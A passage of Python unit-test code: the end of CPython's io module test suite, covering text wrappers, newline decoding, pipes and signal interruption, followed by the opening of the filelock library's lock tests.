txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt.close()
txt.close()
txt.close()
self.assertRaises(ValueError, txt.flush)
def test_unseekable(self):
txt = self.TextIOWrapper(self.MockUnseekableIO(self.testdata))
self.assertRaises(self.UnsupportedOperation, txt.tell)
self.assertRaises(self.UnsupportedOperation, txt.seek, 0)
def test_readonly_attributes(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
buf = self.BytesIO(self.testdata)
with self.assertRaises(AttributeError):
txt.buffer = buf
def test_rawio(self):
# Issue #12591: TextIOWrapper must work with raw I/O objects, so
# that subprocess.Popen() can have the required unbuffered
# semantics with universal_newlines=True.
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
# Reads
self.assertEqual(txt.read(4), 'abcd')
self.assertEqual(txt.readline(), 'efghi\n')
self.assertEqual(list(txt), ['jkl\n', 'opq\n'])
def test_rawio_write_through(self):
# Issue #12591: with write_through=True, writes don't need a flush
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n',
write_through=True)
txt.write('1')
txt.write('23\n4')
txt.write('5')
self.assertEqual(b''.join(raw._write_stack), b'123\n45')
def test_bufio_write_through(self):
# Issue #21396: write_through=True doesn't force a flush()
# on the underlying binary buffered object.
flush_called, write_called = [], []
class BufferedWriter(self.BufferedWriter):
def flush(self, *args, **kwargs):
flush_called.append(True)
return super().flush(*args, **kwargs)
def write(self, *args, **kwargs):
write_called.append(True)
return super().write(*args, **kwargs)
rawio = self.BytesIO()
data = b"a"
bufio = BufferedWriter(rawio, len(data)*2)
textio = self.TextIOWrapper(bufio, encoding='ascii',
write_through=True)
# write to the buffered io but don't overflow the buffer
text = data.decode('ascii')
textio.write(text)
# buffer.flush is not called with write_through=True
self.assertFalse(flush_called)
# buffer.write *is* called with write_through=True
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), b"") # no flush
write_called = [] # reset
textio.write(text * 10) # total content is larger than bufio buffer
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), data * 11) # all flushed
def test_read_nonbytes(self):
# Issue #17106
# Crash when underlying read() returns non-bytes
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read, 1)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.readline)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read)
def test_illegal_decoder(self):
# Issue #17106
# Bypass the early encoding check added in issue 20404
def _make_illegal_wrapper():
quopri = codecs.lookup("quopri")
quopri._is_text_encoding = True
try:
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'),
newline='\n', encoding="quopri")
finally:
quopri._is_text_encoding = False
return t
# Crash when decoder returns non-string
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read, 1)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.readline)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read)
def _check_create_at_shutdown(self, **kwargs):
# Issue #20037: creating a TextIOWrapper at shutdown
# shouldn't crash the interpreter.
iomod = self.io.__name__
code = """if 1:
import codecs
import {iomod} as io
# Avoid looking up codecs at shutdown
codecs.lookup('utf-8')
class C:
def __init__(self):
self.buf = io.BytesIO()
def __del__(self):
io.TextIOWrapper(self.buf, **{kwargs})
print("ok")
c = C()
""".format(iomod=iomod, kwargs=kwargs)
return assert_python_ok("-c", code)
@support.requires_type_collecting
def test_create_at_shutdown_without_encoding(self):
rc, out, err = self._check_create_at_shutdown()
if err:
# Can error out with a RuntimeError if the module state
# isn't found.
self.assertIn(self.shutdown_error, err.decode())
else:
self.assertEqual("ok", out.decode().strip())
@support.requires_type_collecting
def test_create_at_shutdown_with_encoding(self):
rc, out, err = self._check_create_at_shutdown(encoding='utf-8',
errors='strict')
self.assertFalse(err)
self.assertEqual("ok", out.decode().strip())
def test_read_byteslike(self):
r = MemviewBytesIO(b'Just some random string\n')
t = self.TextIOWrapper(r, 'utf-8')
# TextIOwrapper will not read the full string, because
# we truncate it to a multiple of the native int size
# so that we can construct a more complex memoryview.
bytes_val = _to_memoryview(r.getvalue()).tobytes()
self.assertEqual(t.read(200), bytes_val.decode('utf-8'))
def test_issue22849(self):
class F(object):
def readable(self): return True
def writable(self): return True
def seekable(self): return True
for i in range(10):
try:
self.TextIOWrapper(F(), encoding='utf-8')
except Exception:
pass
F.tell = lambda x: 0
t = self.TextIOWrapper(F(), encoding='utf-8')
class MemviewBytesIO(io.BytesIO):
'''A BytesIO object whose read method returns memoryviews
rather than bytes'''
def read1(self, len_):
return _to_memoryview(super().read1(len_))
def read(self, len_):
return _to_memoryview(super().read(len_))
def _to_memoryview(buf):
'''Convert bytes-object *buf* to a non-trivial memoryview'''
arr = array.array('i')
idx = len(buf) - len(buf) % arr.itemsize
arr.frombytes(buf[:idx])
return memoryview(arr)
class CTextIOWrapperTest(TextIOWrapperTest):
io = io
shutdown_error = "RuntimeError: could not find io module state"
def test_initialization(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
self.assertRaises(ValueError, t.read)
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
def test_garbage_collection(self):
# C TextIOWrapper objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends in gc.garbage instead.
with support.check_warnings(('', ResourceWarning)):
rawio = io.FileIO(support.TESTFN, "wb")
b = self.BufferedWriter(rawio)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("456def")
t.x = t
wr = weakref.ref(t)
del t
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"456def")
def test_rwpair_cleared_before_textio(self):
# Issue 13070: TextIOWrapper's finalization would crash when called
# after the reference to the underlying BufferedRWPair's writer got
# cleared by the GC.
for i in range(1000):
b1 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t1 = self.TextIOWrapper(b1, encoding="ascii")
b2 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t2 = self.TextIOWrapper(b2, encoding="ascii")
# circular references
t1.buddy = t2
t2.buddy = t1
support.gc_collect()
class PyTextIOWrapperTest(TextIOWrapperTest):
io = pyio
shutdown_error = "LookupError: unknown encoding: ascii"
class IncrementalNewlineDecoderTest(unittest.TestCase):
def check_newline_decoding_utf8(self, decoder):
# UTF-8 specific tests for a newline decoder
def _check_decode(b, s, **kwargs):
# We exercise getstate() / setstate() as well as decode()
state = decoder.getstate()
self.assertEqual(decoder.decode(b, **kwargs), s)
decoder.setstate(state)
self.assertEqual(decoder.decode(b, **kwargs), s)
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True)
decoder.reset()
_check_decode(b'\n', "\n")
_check_decode(b'\r', "")
_check_decode(b'', "\n", final=True)
_check_decode(b'\r', "\n", final=True)
_check_decode(b'\r', "")
_check_decode(b'a', "\na")
_check_decode(b'\r\r\n', "\n\n")
_check_decode(b'\r', "")
_check_decode(b'\r', "\n")
_check_decode(b'\na', "\na")
_check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n")
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\n', "\n")
_check_decode(b'\xe8\xa2\x88\r', "\u8888")
_check_decode(b'\n', "\n")
def check_newline_decoding(self, decoder, encoding):
result = []
if encoding is not None:
encoder = codecs.getincrementalencoder(encoding)()
def _decode_bytewise(s):
# Decode one byte at a time
for b in encoder.encode(s):
result.append(decoder.decode(bytes([b])))
else:
encoder = None
def _decode_bytewise(s):
# Decode one char at a time
for c in s:
result.append(decoder.decode(c))
self.assertEqual(decoder.newlines, None)
_decode_bytewise("abc\n\r")
self.assertEqual(decoder.newlines, '\n')
_decode_bytewise("\nabc")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc")
self.assertEqual(decoder.newlines, ('\r', '\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual("".join(result), "abc\n\nabcabc\nabcabc")
decoder.reset()
input = "abc"
if encoder is not None:
encoder.reset()
input = encoder.encode(input)
self.assertEqual(decoder.decode(input), "abc")
self.assertEqual(decoder.newlines, None)
def test_newline_decoder(self):
encodings = (
# None meaning the IncrementalNewlineDecoder takes unicode input
# rather than bytes input
None, 'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
for enc in encodings:
decoder = enc and codecs.getincrementaldecoder(enc)()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding(decoder, enc)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding_utf8(decoder)
def test_newline_bytes(self):
# Issue 5433: Excessive optimization in IncrementalNewlineDecoder
def _check(dec):
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0D00"), "\u0D00")
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0A00"), "\u0A00")
self.assertEqual(dec.newlines, None)
dec = self.IncrementalNewlineDecoder(None, translate=False)
_check(dec)
dec = self.IncrementalNewlineDecoder(None, translate=True)
_check(dec)
class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
# XXX Tests for open()
class MiscIOTest(unittest.TestCase):
def tearDown(self):
support.unlink(support.TESTFN)
def test___all__(self):
for name in self.io.__all__:
obj = getattr(self.io, name, None)
self.assertIsNotNone(obj, name)
if name == "open":
continue
elif "error" in name.lower() or name == "UnsupportedOperation":
self.assertTrue(issubclass(obj, Exception), name)
elif not name.startswith("SEEK_"):
self.assertTrue(issubclass(obj, self.IOBase))
def test_attributes(self):
f = self.open(support.TESTFN, "wb", buffering=0)
self.assertEqual(f.mode, "wb")
f.close()
with support.check_warnings(('', DeprecationWarning)):
f = self.open(support.TESTFN, "U")
self.assertEqual(f.name, support.TESTFN)
self.assertEqual(f.buffer.name, support.TESTFN)
self.assertEqual(f.buffer.raw.name, support.TESTFN)
self.assertEqual(f.mode, "U")
self.assertEqual(f.buffer.mode, "rb")
self.assertEqual(f.buffer.raw.mode, "rb")
f.close()
f = self.open(support.TESTFN, "w+")
self.assertEqual(f.mode, "w+")
self.assertEqual(f.buffer.mode, "rb+") # Does it really matter?
self.assertEqual(f.buffer.raw.mode, "rb+")
g = self.open(f.fileno(), "wb", closefd=False)
self.assertEqual(g.mode, "wb")
self.assertEqual(g.raw.mode, "wb")
self.assertEqual(g.name, f.fileno())
self.assertEqual(g.raw.name, f.fileno())
f.close()
g.close()
def test_io_after_close(self):
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "w", "buffering": 1},
{"mode": "w", "buffering": 2},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "r", "buffering": 1},
{"mode": "r", "buffering": 2},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+", "buffering": 1},
{"mode": "w+", "buffering": 2},
{"mode": "w+b", "buffering": 0},
]:
f = self.open(support.TESTFN, **kwargs)
f.close()
self.assertRaises(ValueError, f.flush)
self.assertRaises(ValueError, f.fileno)
self.assertRaises(ValueError, f.isatty)
self.assertRaises(ValueError, f.__iter__)
if hasattr(f, "peek"):
self.assertRaises(ValueError, f.peek, 1)
self.assertRaises(ValueError, f.read)
if hasattr(f, "read1"):
self.assertRaises(ValueError, f.read1, 1024)
self.assertRaises(ValueError, f.read1)
if hasattr(f, "readall"):
self.assertRaises(ValueError, f.readall)
if hasattr(f, "readinto"):
self.assertRaises(ValueError, f.readinto, bytearray(1024))
if hasattr(f, "readinto1"):
self.assertRaises(ValueError, f.readinto1, bytearray(1024))
self.assertRaises(ValueError, f.readline)
self.assertRaises(ValueError, f.readlines)
self.assertRaises(ValueError, f.readlines, 1)
self.assertRaises(ValueError, f.seek, 0)
self.assertRaises(ValueError, f.tell)
self.assertRaises(ValueError, f.truncate)
self.assertRaises(ValueError, f.write,
b"" if "b" in kwargs['mode'] else "")
self.assertRaises(ValueError, f.writelines, [])
self.assertRaises(ValueError, next, f)
def test_blockingioerror(self):
# Various BlockingIOError issues
class C(str):
pass
c = C("")
b = self.BlockingIOError(1, c)
c.b = b
b.c = c
wr = weakref.ref(c)
del c, b
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_abcs(self):
# Test the visible base classes are ABCs.
self.assertIsInstance(self.IOBase, abc.ABCMeta)
self.assertIsInstance(self.RawIOBase, abc.ABCMeta)
self.assertIsInstance(self.BufferedIOBase, abc.ABCMeta)
self.assertIsInstance(self.TextIOBase, abc.ABCMeta)
def _check_abc_inheritance(self, abcmodule):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "wb") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "w") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertIsInstance(f, abcmodule.TextIOBase)
def test_abc_inheritance(self):
# Test implementations inherit from their respective ABCs
self._check_abc_inheritance(self)
def test_abc_inheritance_official(self):
# Test implementations inherit from the official ABCs of the
# baseline "io" module.
self._check_abc_inheritance(io)
def _check_warn_on_dealloc(self, *args, **kwargs):
f = open(*args, **kwargs)
r = repr(f)
with self.assertWarns(ResourceWarning) as cm:
f = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_warn_on_dealloc(self):
self._check_warn_on_dealloc(support.TESTFN, "wb", buffering=0)
self._check_warn_on_dealloc(support.TESTFN, "wb")
self._check_warn_on_dealloc(support.TESTFN, "w")
def _check_warn_on_dealloc_fd(self, *args, **kwargs):
fds = []
def cleanup_fds():
for fd in fds:
try:
os.close(fd)
except OSError as e:
if e.errno != errno.EBADF:
raise
self.addCleanup(cleanup_fds)
r, w = os.pipe()
fds += r, w
self._check_warn_on_dealloc(r, *args, **kwargs)
# When using closefd=False, there's no warning
r, w = os.pipe()
fds += r, w
with support.check_no_resource_warning(self):
open(r, *args, closefd=False, **kwargs)
def test_warn_on_dealloc_fd(self):
self._check_warn_on_dealloc_fd("rb", buffering=0)
self._check_warn_on_dealloc_fd("rb")
self._check_warn_on_dealloc_fd("r")
def test_pickling(self):
# Pickling file objects is forbidden
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+b", "buffering": 0},
]:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
with self.open(support.TESTFN, **kwargs) as f:
self.assertRaises(TypeError, pickle.dumps, f, protocol)
def test_nonblock_pipe_write_bigbuf(self):
self._test_nonblock_pipe_write(16*1024)
def test_nonblock_pipe_write_smallbuf(self):
self._test_nonblock_pipe_write(1024)
@unittest.skipUnless(hasattr(os, 'set_blocking'),
'os.set_blocking() required for this test')
def _test_nonblock_pipe_write(self, bufsize):
sent = []
received = []
r, w = os.pipe()
os.set_blocking(r, False)
os.set_blocking(w, False)
# To exercise all code paths in the C implementation we need
# to play with buffer sizes. For instance, if we choose a
# buffer size less than or equal to _PIPE_BUF (4096 on Linux)
# then we will never get a partial write of the buffer.
rf = self.open(r, mode='rb', closefd=True, buffering=bufsize)
wf = self.open(w, mode='wb', closefd=True, buffering=bufsize)
with rf, wf:
for N in 9999, 73, 7574:
try:
i = 0
while True:
msg = bytes([i % 26 + 97]) * N
sent.append(msg)
wf.write(msg)
i += 1
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
sent[-1] = sent[-1][:e.characters_written]
received.append(rf.read())
msg = b'BLOCKED'
wf.write(msg)
sent.append(msg)
while True:
try:
wf.flush()
break
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
self.assertEqual(e.characters_written, 0)
received.append(rf.read())
received += iter(rf.read, None)
sent, received = b''.join(sent), b''.join(received)
self.assertEqual(sent, received)
self.assertTrue(wf.closed)
self.assertTrue(rf.closed)
def test_create_fail(self):
# 'x' mode fails if file is existing
with self.open(support.TESTFN, 'w'):
pass
self.assertRaises(FileExistsError, self.open, support.TESTFN, 'x')
def test_create_writes(self):
# 'x' mode opens for writing
with self.open(support.TESTFN, 'xb') as f:
f.write(b"spam")
with self.open(support.TESTFN, 'rb') as f:
self.assertEqual(b"spam", f.read())
def test_open_allargs(self):
# there used to be a buffer overflow in the parser for rawmode
self.assertRaises(ValueError, self.open, support.TESTFN, 'rwax+')
class CMiscIOTest(MiscIOTest):
io = io
def test_readinto_buffer_overflow(self):
# Issue #18025
class BadReader(self.io.BufferedIOBase):
def read(self, n=-1):
return b'x' * 10**6
bufio = BadReader()
b = bytearray(2)
self.assertRaises(ValueError, bufio.readinto, b)
@unittest.skipUnless(threading, 'Threading required for this test.')
def check_daemon_threads_shutdown_deadlock(self, stream_name):
# Issue #23309: deadlocks at shutdown should be avoided when a
# daemon thread and the main thread both write to a file.
code = """if 1:
import sys
import time
import threading
from test.support import SuppressCrashReport
file = sys.{stream_name}
def run():
while True:
file.write('.')
file.flush()
crash = SuppressCrashReport()
crash.__enter__()
# don't call __exit__(): the crash occurs at Python shutdown
thread = threading.Thread(target=run)
thread.daemon = True
thread.start()
time.sleep(0.5)
file.write('!')
file.flush()
""".format_map(locals())
res, _ = run_python_until_end("-c", code)
err = res.err.decode()
if res.rc != 0:
# Failure: should be a fatal error
self.assertIn("Fatal Python error: could not acquire lock "
"for <_io.BufferedWriter name='<{stream_name}>'> "
"at interpreter shutdown, possibly due to "
"daemon threads".format_map(locals()),
err)
else:
self.assertFalse(err.strip('.!'))
def test_daemon_threads_shutdown_stdout_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stdout')
def test_daemon_threads_shutdown_stderr_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stderr')
class PyMiscIOTest(MiscIOTest):
io = pyio
@unittest.skipIf(os.name == 'nt', 'POSIX signals required for this test.')
class SignalsTest(unittest.TestCase):
def setUp(self):
self.oldalrm = signal.signal(signal.SIGALRM, self.alarm_interrupt)
def tearDown(self):
signal.signal(signal.SIGALRM, self.oldalrm)
def alarm_interrupt(self, sig, frame):
1/0
@unittest.skipUnless(threading, 'Threading required for this test.')
def check_interrupted_write(self, item, bytes, **fdopen_kwargs):
"""Check that a partial write, when it gets interrupted, properly
invokes the signal handler, and bubbles up the exception raised
in the latter."""
read_results = []
def _read():
if hasattr(signal, 'pthread_sigmask'):
signal.pthread_sigmask(signal.SIG_BLOCK, [signal.SIGALRM])
s = os.read(r, 1)
read_results.append(s)
t = threading.Thread(target=_read)
t.daemon = True
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
large_data = item * (support.PIPE_MAX_SIZE // len(item) + 1)
try:
wio = self.io.open(w, **fdopen_kwargs)
t.start()
# Fill the pipe enough that the write will be blocking.
# It will be interrupted by the timer armed above. Since the
# other thread has read one byte, the low-level write will
# return with a successful (partial) result rather than an EINTR.
# The buffered IO layer must check for pending signal
# handlers, which in this case will invoke alarm_interrupt().
signal.alarm(1)
try:
self.assertRaises(ZeroDivisionError, wio.write, large_data)
finally:
signal.alarm(0)
t.join()
# We got one byte, get another one and check that it isn't a
# repeat of the first one.
read_results.append(os.read(r, 1))
self.assertEqual(read_results, [bytes[0:1], bytes[1:2]])
finally:
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and block again.
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_unbuffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb", buffering=0)
def test_interrupted_write_buffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb")
# Issue #22331: The test hangs on FreeBSD 7.2
@support.requires_freebsd_version(8)
def test_interrupted_write_text(self):
self.check_interrupted_write("xy", b"xy", mode="w", encoding="ascii")
@support.no_tracing
def check_reentrant_write(self, data, **fdopen_kwargs):
def on_alarm(*args):
# Will be called reentrantly from the same thread
wio.write(data)
1/0
signal.signal(signal.SIGALRM, on_alarm)
r, w = os.pipe()
wio = self.io.open(w, **fdopen_kwargs)
try:
signal.alarm(1)
# Either the reentrant call to wio.write() fails with RuntimeError,
# or the signal handler raises ZeroDivisionError.
with self.assertRaises((ZeroDivisionError, RuntimeError)) as cm:
while 1:
for i in range(100):
wio.write(data)
wio.flush()
# Make sure the buffer doesn't fill up and block further writes
os.read(r, len(data) * 100)
exc = cm.exception
if isinstance(exc, RuntimeError):
self.assertTrue(str(exc).startswith("reentrant call"), str(exc))
finally:
wio.close()
os.close(r)
def test_reentrant_write_buffered(self):
self.check_reentrant_write(b"xy", mode="wb")
def test_reentrant_write_text(self):
self.check_reentrant_write("xy", mode="w", encoding="ascii")
def check_interrupted_read_retry(self, decode, **fdopen_kwargs):
"""Check that a buffered read, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
def alarm_handler(sig, frame):
os.write(w, b"bar")
signal.signal(signal.SIGALRM, alarm_handler)
try:
rio = self.io.open(r, **fdopen_kwargs)
os.write(w, b"foo")
signal.alarm(1)
# Expected behaviour:
# - first raw read() returns partial b"foo"
# - second raw read() returns EINTR
# - third raw read() returns b"bar"
self.assertEqual(decode(rio.read(6)), "foobar")
finally:
rio.close()
os.close(w)
os.close(r)
def test_interrupted_read_retry_buffered(self):
self.check_interrupted_read_retry(lambda x: x.decode('latin1'),
mode="rb")
def test_interrupted_read_retry_text(self):
self.check_interrupted_read_retry(lambda x: x,
mode="r")
@unittest.skipUnless(threading, 'Threading required for this test.')
def check_interrupted_write_retry(self, item, **fdopen_kwargs):
"""Check that a buffered write, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
select = support.import_module("select")
# A quantity that exceeds the buffer size of an anonymous pipe's
# write end.
N = support.PIPE_MAX_SIZE
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
# We need a separate thread to read from the pipe and allow the
# write() to finish. This thread is started after the SIGALRM is
# received (forcing a first EINTR in write()).
read_results = []
write_finished = False
error = None
def _read():
try:
while not write_finished:
while r in select.select([r], [], [], 1.0)[0]:
s = os.read(r, 1024)
read_results.append(s)
except BaseException as exc:
nonlocal error
error = exc
t = threading.Thread(target=_read)
t.daemon = True
def alarm1(sig, frame):
signal.signal(signal.SIGALRM, alarm2)
signal.alarm(1)
def alarm2(sig, frame):
t.start()
large_data = item * N
signal.signal(signal.SIGALRM, alarm1)
try:
wio = self.io.open(w, **fdopen_kwargs)
signal.alarm(1)
# Expected behaviour:
# - first raw write() is partial (because of the limited pipe buffer
# and the first alarm)
# - second raw write() returns EINTR (because of the second alarm)
# - subsequent write()s are successful (either partial or complete)
written = wio.write(large_data)
self.assertEqual(N, written)
wio.flush()
write_finished = True
t.join()
self.assertIsNone(error)
self.assertEqual(N, sum(len(x) for x in read_results))
finally:
write_finished = True
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and could block (in case of failure).
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_retry_buffered(self):
self.check_interrupted_write_retry(b"x", mode="wb")
def test_interrupted_write_retry_text(self):
self.check_interrupted_write_retry("x", mode="w", encoding="latin1")
class CSignalsTest(SignalsTest):
io = io
class PySignalsTest(SignalsTest):
io = pyio
# Handling reentrancy issues would slow down _pyio even more, so the
# tests are disabled.
test_reentrant_write_buffered = None
test_reentrant_write_text = None
def load_tests(*args):
tests = (CIOTest, PyIOTest, APIMismatchTest,
CBufferedReaderTest, PyBufferedReaderTest,
CBufferedWriterTest, PyBufferedWriterTest,
CBufferedRWPairTest, PyBufferedRWPairTest,
CBufferedRandomTest, PyBufferedRandomTest,
StatefulIncrementalDecoderTest,
CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest,
CTextIOWrapperTest, PyTextIOWrapperTest,
CMiscIOTest, PyMiscIOTest,
CSignalsTest, PySignalsTest,
)
# Put the namespaces of the IO module we are testing and some useful mock
# classes in the __dict__ of each test.
mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO,
MockNonBlockWriterIO, MockUnseekableIO, MockRawIOWithoutRead)
all_members = io.__all__ + ["IncrementalNewlineDecoder"]
c_io_ns = {name : getattr(io, name) for name in all_members}
py_io_ns = {name : getattr(pyio, name) for name in all_members}
globs = globals()
c_io_ns.update((x.__name__, globs["C" + x.__name__]) for x in mocks)
py_io_ns.update((x.__name__, globs["Py" + x.__name__]) for x in mocks)
# Avoid turning open into a bound method.
py_io_ns["open"] = pyio.OpenWrapper
for test in tests:
if test.__name__.startswith("C"):
for name, obj in c_io_ns.items():
setattr(test, name, obj)
elif test.__name__.startswith("Py"):
for name, obj in py_io_ns.items():
setattr(test, name, obj)
suite = unittest.TestSuite([unittest.makeSuite(test) for test in tests])
return suite
if __name__ == "__main__":
unittest.main()
|
test.py
|
#!/usr/bin/env python
# This is free and unencumbered software released into the public domain.
#
# Anyone is free to copy, modify, publish, use, compile, sell, or
# distribute this software, either in source code form or as a compiled
# binary, for any purpose, commercial or non-commercial, and by any
# means.
#
# In jurisdictions that recognize copyright laws, the author or authors
# of this software dedicate any and all copyright interest in the
# software to the public domain. We make this dedication for the benefit
# of the public at large and to the detriment of our heirs and
# successors. We intend this dedication to be an overt act of
# relinquishment in perpetuity of all present and future rights to this
# software under copyright law.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
# For more information, please refer to <http://unlicense.org>
"""
Some tests for the file lock.
"""
import os
import sys
import unittest
import threading
import errno
import filelock
PY2 = sys.version_info[0] == 2
PY3 = sys.version_info[0] == 3
class ExThread(threading.Thread):
def __init__(self, *args, **kargs):
threading.Thread.__init__(self, *args, **kargs)
self.ex = None
return None
def run(self):
try:
threading.Thread.run(self)
except:
self.ex = sys.exc_info()
return None
def join(self):
threading.Thread.join(self)
if self.ex is not None:
if PY3:
raise self.ex[0].with_traceback(self.ex[1], self.ex[2])
elif PY2:
wrapper_ex = self.ex[1]
raise (wrapper_ex.__class__, wrapper_ex, self.ex[2])
return None
class BaseTest(object):
"""
Base class for all filelock tests.
"""
# The filelock type (class), which is tested.
LOCK_TYPE = None
# The path to the lockfile.
LOCK_PATH = "test.lock"
def setUp(self):
"""Deletes the potential lock file at :attr:`LOCK_PATH`."""
try:
os.remove(self.LOCK_PATH)
except OSError as e:
# FileNotFound
if e.errno != errno.ENOENT:
raise
return None
def tearDown(self):
"""Deletes the potential lock file at :attr:`LOCK_PATH`."""
try:
os.remove(self.LOCK_PATH)
except OSError as e:
# FileNotFound
if e.errno != errno.ENOENT:
raise
return None
def test_simple(self):
"""
Asserts that the lock is locked in a context statement and that the
return value of the *__enter__* method is the lock.
"""
lock = self.LOCK_TYPE(self.LOCK_PATH)
with lock as l:
self.assertTrue(lock.is_locked)
self.assertTrue(lock is l)
self.assertFalse(lock.is_locked)
return None
def test_nested(self):
"""
Asserts, that the lock is not released before the most outer with
statement that locked the lock, is left.
"""
lock = self.LOCK_TYPE(self.LOCK_PATH)
with lock as l1:
self.assertTrue(lock.is_locked)
self.assertTrue(lock is l1)
with lock as l2:
self.assertTrue(lock.is_locked)
self.assertTrue(lock is l2)
with lock as l3:
self.assertTrue(lock.is_locked)
self.assertTrue(lock is l3)
self.assertTrue(lock.is_locked)
self.assertTrue(lock.is_locked)
self.assertFalse(lock.is_locked)
return None
def test_nested1(self):
"""
The same as *test_nested*, but this method uses the *acquire()* method
to create the lock, rather than the implicit *__enter__* method.
"""
lock = self.LOCK_TYPE(self.LOCK_PATH)
with lock.acquire() as l1:
self.assertTrue(lock.is_locked)
self.assertTrue(lock is l1)
with lock.acquire() as l2:
self.assertTrue(lock.is_locked)
self.assertTrue(lock is l2)
